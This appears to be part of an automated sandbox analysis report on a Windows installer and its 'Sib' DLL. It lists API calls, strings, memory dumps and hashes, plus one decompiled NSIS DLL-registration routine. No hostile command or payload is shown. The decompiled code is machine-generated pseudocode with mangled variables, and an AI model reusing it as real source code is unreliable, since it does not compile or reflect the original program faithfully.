                                                                                                                                                    • Instruction Fuzzy Hash: 97C12570941129DFCB24DFA4DC98BE9B7B8AF58304F1086E9D4096B290DB706F85CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62BF30, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 163memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 6E62BFA9
                                                                                                                                                      • Part of subcall function 6E62A6B0: UuidCreate.RPCRT4(?), ref: 6E62A6F2
                                                                                                                                                      • Part of subcall function 6E62A6B0: UuidToStringW.RPCRT4(?,00000000), ref: 6E62A710
                                                                                                                                                      • Part of subcall function 6E62A6B0: RpcStringFreeW.RPCRT4(00000000), ref: 6E62A735
                                                                                                                                                      • Part of subcall function 6E62A6B0: _DebugHeapAllocator.LIBCPMTD ref: 6E62A74E
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62C00E
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62C048
                                                                                                                                                      • Part of subcall function 6E628FD0: _DebugHeapAllocator.LIBCPMTD ref: 6E628FDE
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62C0AB
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62C0C1
                                                                                                                                                      • Part of subcall function 6E62A490: _fwprintf.LIBCONCRTD ref: 6E62A588
                                                                                                                                                    Strings
                                                                                                                                                    • 1.0.0, xrefs: 6E62C03D
                                                                                                                                                    • {"productCode": "%s","upgradeCode": "%s"}, xrefs: 6E62C107
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$ProcessorStringUuidVirtual$Base::Concurrency::Concurrency::details::ContextCreateFreeIdentityQueueRootRoot::Work_fwprintf
                                                                                                                                                    • String ID: 1.0.0${"productCode": "%s","upgradeCode": "%s"}
                                                                                                                                                    • API String ID: 1708109837-1423552966
                                                                                                                                                    • Opcode ID: e3cbcba6ceb77dde5a01cac1e88767b8f7ddc100a47712497f1b7b1a3166e6ab
                                                                                                                                                    • Instruction ID: 19be182622a032c2aa9be40548d062f30f9acc9ab1ff2688c459c49bbed3eb7c
                                                                                                                                                    • Opcode Fuzzy Hash: e3cbcba6ceb77dde5a01cac1e88767b8f7ddc100a47712497f1b7b1a3166e6ab
                                                                                                                                                    • Instruction Fuzzy Hash: 6B7118B0D05249DFCB04CBE8D990BEEBBB5AF55308F144968D4116B381DB746A04CBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004023F0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                    			E004023F0(void* __ebx) {
				void* _t28;

				 *(_t28 - 4) = 1;
				if( *0x47eb98 < __ebx) {
					E00404F9E(0xffffffe7, 0x4100f0);
					_push(L"Error registering DLL: Could not initialize OLE");
					E004062CF();
					goto L2;
				} else {
					__edi = E0040145C(__edx, 0xfffffff0);
					 *((intOrPtr*)(__ebp - 8)) = E0040145C(__edx, 1);
					if( *((intOrPtr*)(__ebp - 0x1c)) == __ebx) {
						L6:
						__eax = LoadLibraryExW(__edi, __ebx, 8); // executed
						 *(__ebp + 8) = __eax;
						if(__eax == __ebx) {
							__eax = E00404F9E(0xfffffff6, 0x4100f0);
							_push(__edi);
							_push(L"Error registering DLL: Could not load %s");
							__eax = E004062CF();
							L2:
						} else {
							goto L7;
						}
					} else {
						__eax = GetModuleHandleW(__edi); // executed
						 *(__ebp + 8) = __eax;
						if(__eax != __ebx) {
							L7:
							__esi = E00406391( *(__ebp + 8),  *((intOrPtr*)(__ebp - 8)));
							if(__esi == __ebx) {
								__eax = E00404F9E(0xfffffff7,  *((intOrPtr*)(__ebp - 8)));
								_push(__edi);
								__eax = E004062CF(L"Error registering DLL: %s not found in %s",  *((intOrPtr*)(__ebp - 8)));
							} else {
								 *(__ebp - 4) = __ebx;
								if( *((intOrPtr*)(__ebp - 0x24)) == __ebx) {
									__eax =  *__esi( *((intOrPtr*)(__ebp - 0xc)), 0x2004, 0x47f000, 0x40c0e0, "`�G"); // executed
									__esp = __esp + 0x14;
								} else {
									__eax = E00401435( *((intOrPtr*)(__ebp - 0x24)));
									if( *__esi() != 0) {
										 *(__ebp - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(__ebp - 0x20)) == __ebx && E00403CE4( *(__ebp + 8)) != 0) {
								__eax = FreeLibrary( *(__ebp + 8));
							}
						} else {
							goto L6;
						}
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *(_t28 - 4);
				return 0;
			}




                                                                                                                                                    0x004023f0
                                                                                                                                                    0x004023fd
                                                                                                                                                    0x004024ec
                                                                                                                                                    0x004024f1
                                                                                                                                                    0x004017a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402403
                                                                                                                                                    0x0040240c
                                                                                                                                                    0x00402413
                                                                                                                                                    0x00402419
                                                                                                                                                    0x00402429
                                                                                                                                                    0x0040242d
                                                                                                                                                    0x00402433
                                                                                                                                                    0x00402438
                                                                                                                                                    0x004024d5
                                                                                                                                                    0x004024da
                                                                                                                                                    0x004024db
                                                                                                                                                    0x00401957
                                                                                                                                                    0x004017ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040241b
                                                                                                                                                    0x0040241c
                                                                                                                                                    0x00402422
                                                                                                                                                    0x00402427
                                                                                                                                                    0x0040243e
                                                                                                                                                    0x00402449
                                                                                                                                                    0x0040244d
                                                                                                                                                    0x00402491
                                                                                                                                                    0x00402496
                                                                                                                                                    0x0040249f
                                                                                                                                                    0x0040244f
                                                                                                                                                    0x0040244f
                                                                                                                                                    0x00402455
                                                                                                                                                    0x00402485
                                                                                                                                                    0x00402487
                                                                                                                                                    0x00402457
                                                                                                                                                    0x0040245a
                                                                                                                                                    0x00402463
                                                                                                                                                    0x00402465
                                                                                                                                                    0x00402465
                                                                                                                                                    0x00402463
                                                                                                                                                    0x00402455
                                                                                                                                                    0x004024aa
                                                                                                                                                    0x004024c3
                                                                                                                                                    0x004024c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402427
                                                                                                                                                    0x00402419
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425AD2,74B5EA30,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425AD2,74B5EA30,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                    Strings
                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                    • Opcode ID: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                    • Opcode Fuzzy Hash: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E629940, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 174memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6E629A16
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 6E629A38
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629A52
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E6299C4
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629B02
                                                                                                                                                    • sibjs, xrefs: 6E629AA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$AllocBase::Concurrency::details::ContextFreeIdentityQueueWork
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$sibjs
                                                                                                                                                    • API String ID: 2894111969-246635303
                                                                                                                                                    • Opcode ID: 3d63183b7d678638e59703589364630e19fb0e29f17247bb132aaf726ed4b92f
                                                                                                                                                    • Instruction ID: 9d5fb055ae09b46f5f9c8023b3576ca69be38da64505d84e580cd7a2758bca96
                                                                                                                                                    • Opcode Fuzzy Hash: 3d63183b7d678638e59703589364630e19fb0e29f17247bb132aaf726ed4b92f
                                                                                                                                                    • Instruction Fuzzy Hash: C571C4B4A00109DFCB04DFD8D894EAEB7B9BF88314F104668E515A7390DB75AE45CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64F5F0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95memorycomthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,3920FDCC), ref: 6E64F63A
                                                                                                                                                    • CoCreateInstance.OLE32(6E692830,00000000,00000001,6E692840,6E69F8D4), ref: 6E64F69C
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64F7AC
                                                                                                                                                    • ExitThread.KERNEL32 ref: 6E64F7C0
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp, xrefs: 6E64F6AB
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp, xrefs: 6E64F649
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorBase::Concurrency::details::ContextCreateDebugExitHeapIdentityInitializeInstanceQueueThreadWork
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibuia\Globals.cpp
                                                                                                                                                    • API String ID: 2386534328-2759539606
                                                                                                                                                    • Opcode ID: 59e01250a5759c883174b7d0cd0ab50f25c285eb6325288b239a8415c63393e5
                                                                                                                                                    • Instruction ID: cc514fa19962d5161b4a2e208ba3bb5edead343fd65f2dff0e0f0212597d1800
                                                                                                                                                    • Opcode Fuzzy Hash: 59e01250a5759c883174b7d0cd0ab50f25c285eb6325288b239a8415c63393e5
                                                                                                                                                    • Instruction Fuzzy Hash: AD313C70950209EFDB40DFE5D954FEEBBB9AF09318F204529E401B7280DB742A04CB6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6313E0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94memoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E660E77: GetTempPathW.KERNEL32(00000104,?), ref: 6E660EA0
                                                                                                                                                      • Part of subcall function 6E660E77: GetTempFileNameW.KERNELBASE(?,00000104,00000000,?), ref: 6E660EBF
                                                                                                                                                      • Part of subcall function 6E660E77: GetLastError.KERNEL32 ref: 6E660EC9
                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000,000000FF,sib,00000000,00000104,00000104,3920FDCC), ref: 6E631494
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6314FA
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp, xrefs: 6E63144B
                                                                                                                                                    • sib, xrefs: 6E63142E
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp, xrefs: 6E6314B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileTemp$AllocatorBase::Concurrency::details::ContextDebugDeleteErrorHeapIdentityLastNamePathQueueWork
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\EnvTools.cpp$sib
                                                                                                                                                    • API String ID: 3679817218-2030889379
                                                                                                                                                    • Opcode ID: e47ffb8855ffef94f596830f75b38a5d853284d777668cfc3c05a04078179c95
                                                                                                                                                    • Instruction ID: bd25118f5adac27db54500eca697b745a540d6ef63578436baf1d3df140e6b84
                                                                                                                                                    • Opcode Fuzzy Hash: e47ffb8855ffef94f596830f75b38a5d853284d777668cfc3c05a04078179c95
                                                                                                                                                    • Instruction Fuzzy Hash: D531F970D10159EFDB04DBE4D951BEEB7B8AF18318F504A29E421B72D0EB742A44CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E631530, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E63155F
                                                                                                                                                    • RegisterEventSourceW.ADVAPI32(00000000,SIB), ref: 6E631599
                                                                                                                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 6E63162F
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EventSource$Base::Concurrency::details::ContextDeregisterIdentityQueueRegisterWorkstd::ios_base::good
                                                                                                                                                    • String ID: SIB
                                                                                                                                                    • API String ID: 2106344010-684891403
                                                                                                                                                    • Opcode ID: 140d7c39df60b5c0c7c1e89cd98372052d181c351d83aaa003d64c9c7d3739a4
                                                                                                                                                    • Instruction ID: 0fd61ab555173a4407a912bbfc23be061a28bca008bffb011ef5e26727f49173
                                                                                                                                                    • Opcode Fuzzy Hash: 140d7c39df60b5c0c7c1e89cd98372052d181c351d83aaa003d64c9c7d3739a4
                                                                                                                                                    • Instruction Fuzzy Hash: B1315EB0940219DFDB00CFD5C914BEEB7B8FF05314F205629E522AB2C0DB749A48CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E661373, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(00000000,6E6314AA,?,?,?,6E6314AA,00000000,00000000), ref: 6E661381
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,6E6314AA,00000000,00000000), ref: 6E66138F
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(00000000,6E6314AA,?,?,?,?,6E6314AA,00000000,00000000), ref: 6E6613FF
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6E6314AA,00000000,00000000), ref: 6E661409
                                                                                                                                                    Strings
                                                                                                                                                    • c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp, xrefs: 6E661439
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                    • String ID: c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp
                                                                                                                                                    • API String ID: 1375471231-2061300336
                                                                                                                                                    • Opcode ID: 4688e96790c0fc7621f06c483ea535ff5578a43cd07c1d7fd7915a5c2090187a
                                                                                                                                                    • Instruction ID: 6499012aad51a19cd3e4f63c6b227feb48cf8c5bc63ab4fbc44169041aee82a1
                                                                                                                                                    • Opcode Fuzzy Hash: 4688e96790c0fc7621f06c483ea535ff5578a43cd07c1d7fd7915a5c2090187a
                                                                                                                                                    • Instruction Fuzzy Hash: A6212B36AA4232ABDB614FE6884476F7769DF57BA0F014025FD4DFB250D7608D0582E3
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E660E77, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 6E660EA0
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,00000104,00000000,?), ref: 6E660EBF
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E660EC9
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E660F00
                                                                                                                                                    Strings
                                                                                                                                                    • c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp, xrefs: 6E660F21
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastTemp$FileNamePath
                                                                                                                                                    • String ID: c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp
                                                                                                                                                    • API String ID: 891594076-2061300336
                                                                                                                                                    • Opcode ID: 99e2d0ada278037dd3e7137467d26b11a6ae16b09d554ac2c8bfc8a28154bdc7
                                                                                                                                                    • Instruction ID: 5f5e8e7576883ef0419a5e3da871cb367fbc3f44a1bc972210ebaedec8520cc9
                                                                                                                                                    • Opcode Fuzzy Hash: 99e2d0ada278037dd3e7137467d26b11a6ae16b09d554ac2c8bfc8a28154bdc7
                                                                                                                                                    • Instruction Fuzzy Hash: 9E11D2B696113AABDB708AE58C04B9B77ACAB02754F010475AE11EB240F670DD008AE6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62A6B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 6E62A6F2
                                                                                                                                                    • UuidToStringW.RPCRT4(?,00000000), ref: 6E62A710
                                                                                                                                                    • RpcStringFreeW.RPCRT4(00000000), ref: 6E62A735
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62A74E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StringUuid$AllocatorCreateDebugFreeHeap
                                                                                                                                                    • String ID: {%s}
                                                                                                                                                    • API String ID: 1283604287-2304400190
                                                                                                                                                    • Opcode ID: 0b722791832e504f3b69eba0faa9b202a2bc9b08418c2041821cf26a7e29cf13
                                                                                                                                                    • Instruction ID: 9edb2bc8fc9d1105935e02a10c55adc6fa68e6ab9791b1577ea4dd1a3c6a8a21
                                                                                                                                                    • Opcode Fuzzy Hash: 0b722791832e504f3b69eba0faa9b202a2bc9b08418c2041821cf26a7e29cf13
                                                                                                                                                    • Instruction Fuzzy Hash: 0421C975D102089FCB04DFE4D944BEDBBB8FB19314F544669E412A6280EB75AA48CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64F2A0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64F33E
                                                                                                                                                      • Part of subcall function 6E62C3C0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,3920FDCC), ref: 6E62C409
                                                                                                                                                      • Part of subcall function 6E62C3C0: Sleep.KERNELBASE(00000064), ref: 6E62C411
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64F35E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$FileModuleNameSleep
                                                                                                                                                    • String ID: \sib.dat$hAn$|ohn
                                                                                                                                                    • API String ID: 3729167558-3894003941
                                                                                                                                                    • Opcode ID: cbb037369a89222beb8e0764b6580340074a8a000d66e15c3e77f1daa8de98e1
                                                                                                                                                    • Instruction ID: 0314304dcd201fc8a6a720db187a6b11301b295ba0ae73efd54870cfa4f93913
